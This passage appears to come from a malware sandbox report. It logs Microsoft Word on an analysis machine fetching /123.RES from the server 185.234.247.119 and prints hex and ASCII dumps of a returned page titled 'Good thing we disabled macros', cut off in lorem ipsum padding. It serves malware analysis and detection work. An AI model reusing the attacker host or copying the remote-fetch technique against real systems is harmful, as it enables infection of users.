20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65
        Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
        Jun 7, 2022 19:44:37.435573101 CEST11OUTHEAD /123.RES HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: 185.234.247.119
        Content-Length: 0
        Connection: Keep-Alive
        Jun 7, 2022 19:44:37.463280916 CEST12INHTTP/1.1 200 OK
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:37 GMT
        Content-Type: application/octet-stream
        Content-Length: 6241
        Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
        Connection: keep-alive
        ETag: "6299dd5d-1861"
        Accept-Ranges: bytes
        Jun 7, 2022 19:44:37.473567963 CEST12OUTOPTIONS / HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: 185.234.247.119
        Content-Length: 0
        Connection: Keep-Alive
        Jun 7, 2022 19:44:37.501120090 CEST12INHTTP/1.1 405 Not Allowed
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:37 GMT
        Content-Type: text/html
        Content-Length: 150
        Connection: keep-alive
        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
        Jun 7, 2022 19:44:37.579617977 CEST13OUTGET /123.RES HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: 185.234.247.119
        If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
        If-None-Match: "6299dd5d-1861"
        Connection: Keep-Alive
        Jun 7, 2022 19:44:37.607300997 CEST13INHTTP/1.1 304 Not Modified
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:37 GMT
        Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
        Connection: keep-alive
        ETag: "6299dd5d-1861"
        Jun 7, 2022 19:44:37.834969997 CEST14OUTHEAD /123.RES HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: 185.234.247.119
        Content-Length: 0
        Connection: Keep-Alive
        Jun 7, 2022 19:44:37.863265038 CEST14INHTTP/1.1 200 OK
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:37 GMT
        Content-Type: application/octet-stream
        Content-Length: 6241
        Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
        Connection: keep-alive
        ETag: "6299dd5d-1861"
        Accept-Ranges: bytes


        Session IDSource IPSource PortDestination IPDestination PortProcess
        1192.168.2.2249172185.234.247.11980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Jun 7, 2022 19:44:32.684813023 CEST3OUTHEAD /123.RES HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: 185.234.247.119
        Jun 7, 2022 19:44:32.718305111 CEST3INHTTP/1.1 200 OK
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:32 GMT
        Content-Type: application/octet-stream
        Content-Length: 6241
        Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
        Connection: keep-alive
        ETag: "6299dd5d-1861"
        Accept-Ranges: bytes
        Jun 7, 2022 19:44:37.536554098 CEST12OUTHEAD /123.RES HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: 185.234.247.119
        Jun 7, 2022 19:44:37.564064980 CEST13INHTTP/1.1 200 OK
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:37 GMT
        Content-Type: application/octet-stream
        Content-Length: 6241
        Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
        Connection: keep-alive
        ETag: "6299dd5d-1861"
        Accept-Ranges: bytes


        Session IDSource IPSource PortDestination IPDestination PortProcess
        2192.168.2.2249173185.234.247.11980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Jun 7, 2022 19:44:36.961354017 CEST3OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: 185.234.247.119
        Jun 7, 2022 19:44:36.991637945 CEST4INHTTP/1.1 405 Not Allowed
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:36 GMT
        Content-Type: text/html
        Content-Length: 150
        Connection: keep-alive
        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


        No statistics
        Target ID:0
        Start time:19:45:12
        Start date:07/06/2022
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13f540000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        No disassembly